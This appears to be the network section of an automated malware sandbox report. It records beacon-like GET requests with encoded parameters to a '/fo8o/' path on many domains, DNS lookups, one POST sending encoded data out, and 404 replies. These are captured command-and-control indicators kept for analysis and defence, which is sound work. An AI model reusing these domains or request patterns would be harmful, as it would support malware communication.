            Source: global trafficHTTP traffic detected: GET /fo8o/?Ixe=Apq4tPPXNdTp2&blWd=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjNWAySNtnq/EMXCTP7S4oEh8mb9sAZyquFiTVTuU6HpMKOeASrGw= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.magmadokum.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?blWd=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp7YHjVi2aBezyBUOenUja13YBEIShwN33HoHbXtrY+oqbh1getk=&Ixe=Apq4tPPXNdTp2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.rssnewscast.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?Ixe=Apq4tPPXNdTp2&blWd=iiIkdrB6KYcVQoN0c6CfZniI+lK17wmUSOc41yM1Q/k97jiJcokuWPbOTxiCodGWiOQkUrp21l37eyMeLTp+RFkz+4bzDeEKKqRZgAR6qoTILtOL6EdJZhJZBnFdSPOr30I02M8= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.liangyuen528.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?blWd=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5haoQH1WjEWithRFLxLKOV4ce9fWCCnKIVX4jHNmrNLQZpWctVBLU=&Ixe=Apq4tPPXNdTp2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.techchains.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?Ixe=Apq4tPPXNdTp2&blWd=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMgl3a4mkxzPbkN9BQKjpJMF6ezHcknvvvjzNmyPcHDwhODu1wVk= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.elettrosistemista.zipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?blWd=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pCTG1dl0n9Zx5sBovXqlibLG+oTQgCZHMA1AF4xfdSZkJv4XAGCI=&Ixe=Apq4tPPXNdTp2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.donnavariedades.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?blWd=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYS1O+KnDGu0Ee7a9fQq7JRnHJ6pn6i4sEdb7G20jo8euDHkgubc=&Ixe=Apq4tPPXNdTp2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.empowermedeco.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?Ixe=Apq4tPPXNdTp2&blWd=4jpq/azRsxa5RUjY86tNWfjSBjUfGmQA/bC5edk8IUrTRSqWoRPa/8wzulAZuqVnvDzKNkDL1IzsWztH+C0v0tvbjYVZrXx7xEZksJc7712LnlYWiWRTV2JAY9clvZ1jJotY128= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.joyesi.xyzConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?Ixe=Apq4tPPXNdTp2&blWd=CKPof6WmPR8MjyGgZoDlhb60KxQVVSuHH5TS1bRPLOh5omNg/qt+/6bvCL2pthCxfTLrkj/U4P5Lt/hzCRdBTD8WClZdEhsa3dPrDeE1SdlnJbrG6MsWCo/sylvA1Bg/24QA05c= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.shenzhoucui.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?blWd=AU3XYvZFaGSlytwuLg8MPaUQqx3yoZo+slWhncsJrkz7OmZN7i/xsh6l91syvPfChHr514cSZiYi12sQUpLBNWUGgXkiv5tYdsczWAt3YIqQCRozzWbYSNnfkFwi3fxcOtzIASs=&Ixe=Apq4tPPXNdTp2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.b301.spaceConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?Ixe=Apq4tPPXNdTp2&blWd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnyIi7V/S5J9AzlXPHqpluzE36hxZsh30r8poflPmNwlfmk35jvL8= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.3xfootball.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficDNS traffic detected: DNS query: www.3xfootball.com
            Source: global trafficDNS traffic detected: DNS query: www.kasegitai.tokyo
            Source: global trafficDNS traffic detected: DNS query: www.goldenjade-travel.com
            Source: global trafficDNS traffic detected: DNS query: www.antonio-vivaldi.mobi
            Source: global trafficDNS traffic detected: DNS query: www.magmadokum.com
            Source: global trafficDNS traffic detected: DNS query: www.rssnewscast.com
            Source: global trafficDNS traffic detected: DNS query: www.liangyuen528.com
            Source: global trafficDNS traffic detected: DNS query: www.techchains.info
            Source: global trafficDNS traffic detected: DNS query: www.elettrosistemista.zip
            Source: global trafficDNS traffic detected: DNS query: www.donnavariedades.com
            Source: global trafficDNS traffic detected: DNS query: www.660danm.top
            Source: global trafficDNS traffic detected: DNS query: www.empowermedeco.com
            Source: global trafficDNS traffic detected: DNS query: www.joyesi.xyz
            Source: global trafficDNS traffic detected: DNS query: www.k9vyp11no3.cfd
            Source: global trafficDNS traffic detected: DNS query: www.shenzhoucui.com
            Source: global trafficDNS traffic detected: DNS query: www.b301.space
            Source: unknownHTTP traffic detected: POST /fo8o/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.kasegitai.tokyoOrigin: http://www.kasegitai.tokyoCache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 209Referer: http://www.kasegitai.tokyo/fo8o/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)Data Raw: 62 6c 57 64 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 4a 5a 76 70 77 56 49 68 75 42 43 58 53 48 62 6c 32 71 6c 5a 2b 79 49 57 5a 2b 61 46 2f 2f 42 72 6b 77 51 5a 6d 6c 71 64 38 54 35 32 76 54 57 45 67 77 41 56 68 42 38 69 6e 33 6f 45 74 35 2f 53 55 34 79 6d 76 43 4e 39 73 66 79 73 79 67 68 45 77 5a 4f 31 47 62 49 4d 4c 67 45 53 42 69 78 58 65 77 45 46 2f 33 64 62 2b 4f 4f 6c 58 45 70 6a 39 6f 58 75 59 57 54 43 67 42 68 32 50 37 39 7a 47 73 76 43 58 68 7a 62 50 30 42 39 74 70 48 4a 50 4e 6d 66 66 33 4f 6a 34 68 39 38 78 6f 45 48 42 33 45 74 49 7a 2f 63 65 67 36 4e 67 68 4d 58 57 72 64 61 4a 39 74 62 66 31 64 53 36 4e 39 38 Data Ascii: blWd=5JlKLzaKVp1wJZvpwVIhuBCXSHbl2qlZ+yIWZ+aF//BrkwQZmlqd8T52vTWEgwAVhB8in3oEt5/SU4ymvCN9sfysyghEwZO1GbIMLgESBixXewEF/3db+OOlXEpj9oXuYWTCgBh2P79zGsvCXhzbP0B9tpHJPNmff3Oj4h98xoEHB3EtIz/ceg6NghMXWrdaJ9tbf1dS6N98
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Fri, 02 Aug 2024 11:51:21 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Fri, 02 Aug 2024 11:51:25 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Fri, 02 Aug 2024 11:51:27 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Fri, 02 Aug 2024 11:51:30 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Fri, 02 Aug 2024 11:51:36 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Fri, 02 Aug 2024 11:51:38 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Fri, 02 Aug 2024 11:51:41 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
